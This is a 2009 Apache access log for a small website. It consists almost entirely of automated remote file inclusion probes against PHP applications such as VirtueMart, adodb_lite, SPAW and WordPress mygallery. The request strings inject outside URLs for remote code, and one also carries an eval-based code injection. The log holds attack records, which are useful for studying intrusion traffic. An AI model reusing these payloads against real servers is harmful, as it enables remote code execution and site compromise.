89.108.83.240 - - [29/Jun/2009:20:30:00 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:30:24 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:30:24 -0700] "GET /logs/access.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:30:24 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:30:29 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:30:29 -0700] "GET /logs/access.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:30:29 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:30:52 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:30:52 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:30:52 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:32:48 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:32:48 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:32:48 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:34:23 -0700] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:35:43 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:20:36:05 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:20:36:05 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:20:36:05 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.redneckmba.com"
38.103.48.109 - - [29/Jun/2009:20:36:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "redneckmba.com"
38.103.48.109 - - [29/Jun/2009:20:36:15 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "redneckmba.com"
38.103.48.109 - - [29/Jun/2009:20:36:15 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.topchelny.ru/799779e72820f2a2bd77e313e6ac0b0c/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "redneckmba.com"
203.151.217.29 - - [29/Jun/2009:20:36:50 -0700] "GET /logs/access.log//redaxo/classes/class.inuse.php?sec=http://www.usher.co.kr//flvPlay/id.txt%20%20%20%20? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
38.117.93.134 - - [29/Jun/2009:20:38:43 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
38.117.93.134 - - [29/Jun/2009:20:38:43 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
38.117.93.134 - - [29/Jun/2009:20:38:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
38.117.93.134 - - [29/Jun/2009:20:38:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
38.117.93.134 - - [29/Jun/2009:20:38:52 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
38.117.93.134 - - [29/Jun/2009:20:38:52 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
211.203.180.144 - - [29/Jun/2009:20:39:08 -0700] "GET /logs/access.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
88.81.249.202 - - [29/Jun/2009:20:39:18 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
88.81.249.202 - - [29/Jun/2009:20:39:18 -0700] "GET /logs/access.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
88.81.249.202 - - [29/Jun/2009:20:39:18 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:41:55 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:41:55 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.108.83.240 - - [29/Jun/2009:20:41:55 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [29/Jun/2009:20:47:15 -0700] "GET /logs/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [29/Jun/2009:20:47:15 -0700] "GET /popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
60.43.229.5 - - [29/Jun/2009:20:47:16 -0700] "GET /logs/access.log%20%20/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
210.205.57.2 - - [29/Jun/2009:20:55:54 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
210.205.57.2 - - [29/Jun/2009:20:55:54 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
210.205.57.2 - - [29/Jun/2009:20:55:55 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
218.234.21.178 - - [29/Jun/2009:20:56:54 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.redneckmba.com"
218.234.21.178 - - [29/Jun/2009:20:56:54 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.redneckmba.com"
218.234.21.178 - - [29/Jun/2009:20:56:54 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.redneckmba.com"
218.234.21.178 - - [29/Jun/2009:20:58:37 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
218.234.21.178 - - [29/Jun/2009:20:58:37 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
218.234.21.178 - - [29/Jun/2009:20:58:37 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
65.23.158.226 - - [29/Jun/2009:20:58:47 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
65.23.158.226 - - [29/Jun/2009:20:58:47 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
65.23.158.226 - - [29/Jun/2009:20:58:47 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.redneckmba.com"
65.23.158.226 - - [29/Jun/2009:20:58:59 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
65.23.158.226 - - [29/Jun/2009:20:58:59 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
65.23.158.226 - - [29/Jun/2009:20:58:59 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.redneckmba.com"
60.43.229.5 - - [29/Jun/2009:20:59:02 -0700] "GET /logs/access.log/popup.php?path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:21:00:41 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:21:00:41 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:21:00:42 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:21:00:45 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:21:00:45 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.150.78.245 - - [29/Jun/2009:21:00:45 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:21:05:38 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:21:05:38 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.11.230.36 - - [29/Jun/2009:21:05:38 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.138.156.3 - - [29/Jun/2009:21:08:30 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.138.156.3 - - [29/Jun/2009:21:08:30 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
124.138.156.3 - - [29/Jun/2009:21:08:32 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.206 - - [29/Jun/2009:21:11:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
209.172.33.230 - - [29/Jun/2009:21:11:33 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
209.172.33.230 - - [29/Jun/2009:21:11:33 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
209.172.33.230 - - [29/Jun/2009:21:11:33 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
163.20.160.14 - - [29/Jun/2009:21:12:19 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
163.20.160.14 - - [29/Jun/2009:21:12:19 -0700] "GET /logs/access.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
163.20.160.14 - - [29/Jun/2009:21:12:19 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:13:10 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:13:10 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:13:10 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:13:15 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:13:15 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:13:15 -0700] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:14:43 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:14:43 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:14:43 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:14:49 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:14:49 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
213.133.106.193 - - [29/Jun/2009:21:14:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
38.117.93.134 - - [29/Jun/2009:21:16:54 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
38.117.93.134 - - [29/Jun/2009:21:16:54 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
38.117.93.134 - - [29/Jun/2009:21:16:54 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.taxratio.com/advancedpoll//cmss/yes.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
209.172.33.230 - - [29/Jun/2009:21:18:39 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
209.172.33.230 - - [29/Jun/2009:21:18:39 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
209.172.33.230 - - [29/Jun/2009:21:18:39 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:40 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:40 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:43 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:43 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:43 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:44 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
218.232.105.116 - - [29/Jun/2009:21:18:44 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "redneckmba.com"
